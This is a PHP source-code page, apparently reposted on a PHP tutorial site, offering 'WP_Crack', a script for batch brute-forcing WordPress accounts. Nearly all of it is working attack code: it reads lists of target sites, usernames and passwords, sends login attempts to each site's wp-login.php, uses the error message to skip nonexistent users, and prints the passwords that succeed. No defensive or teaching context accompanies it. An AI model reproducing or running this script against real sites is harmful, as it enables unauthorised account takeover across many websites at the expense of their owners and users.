>php教程 >PHP源码 >WP_Crack(批量爆破Wordpress 账户)

WP_Crack(批量爆破Wordpress 账户)

PHP中文网
PHP中文网원래의
2016-05-25 17:06:052099검색

<?php
$HostList = file(&#39;url.txt&#39;);
$users    = file(&#39;users.txt&#39;);
$Psws     = file(&#39;pass.txt&#39;);

foreach ($HostList as $url)
{
    $url = Trim($url);
	
    $PostUrl = $url.&#39;/wp-login.php&#39;;
	$_Path_status_code = GetHttpStatusCode(Trim($PostUrl));
	//echo $PostUrl.&#39; &#39;.$_Path_status_code."\n";
	if (&#39;404&#39; == $_Path_status_code)
	{
	    Continue;
	}

    foreach ($users as $username)
	{
        $username = Trim($username);
	    foreach ($Psws as $now)
	    {
		    $now = Trim($now);
	        $curlPost = &#39;log=&#39;.$username.&#39;&pwd=&#39;.urlencode($now);
		    $Rs = POST_Data($PostUrl, $curlPost);
		    $fail_tag = &#39;<strong>&#39;.$username.&#39;</strong>&#39;;
		    if (stristr($Rs, &#39;<strong>ERROR</strong>: Invalid username&#39;)) # 不存在的用户名跳过猜解
		    {
		        Break;
		    }
            if (!stristr($Rs, $fail_tag))
		    {
		        echo $PostUrl.&#39; &#39;.&#39;Password:&#39;.$now.&#39; # Succed!&#39;."\n";
		    }
	    }
	}


}

     function GetHttpStatusCode($url){ 
         $curl = curl_init();
         curl_setopt($curl,CURLOPT_URL,$url);//获取内容url 
         curl_setopt($curl,CURLOPT_HEADER,1);//获取http头信息 
         curl_setopt($curl,CURLOPT_NOBODY,1);//不返回html的body信息 
         curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);//返回数据流,不直接输出 
         curl_setopt($curl,CURLOPT_TIMEOUT,3); //超时时长,单位秒 
         curl_exec($curl);
         $rtn= curl_getinfo($curl,CURLINFO_HTTP_CODE);
         curl_close($curl);
         return  $rtn;
     }


function POST_Data($PostUrl, $DATA)
{
    $ch = curl_init();//初始化curl
    curl_setopt($ch,CURLOPT_URL, $PostUrl);//抓取指定网页
    curl_setopt($ch, CURLOPT_HEADER, 0);//设置header
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//要求结果为字符串且输出到屏幕上
    curl_setopt($ch, CURLOPT_POST, 1);//post提交方式
    curl_setopt($ch, CURLOPT_POSTFIELDS, $DATA);
    $data = curl_exec($ch);//运行curl
    curl_close($ch);
    return $data;//输出结果
}


?>

WP_Crack(批量爆破Wordpress 账户)

성명:
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.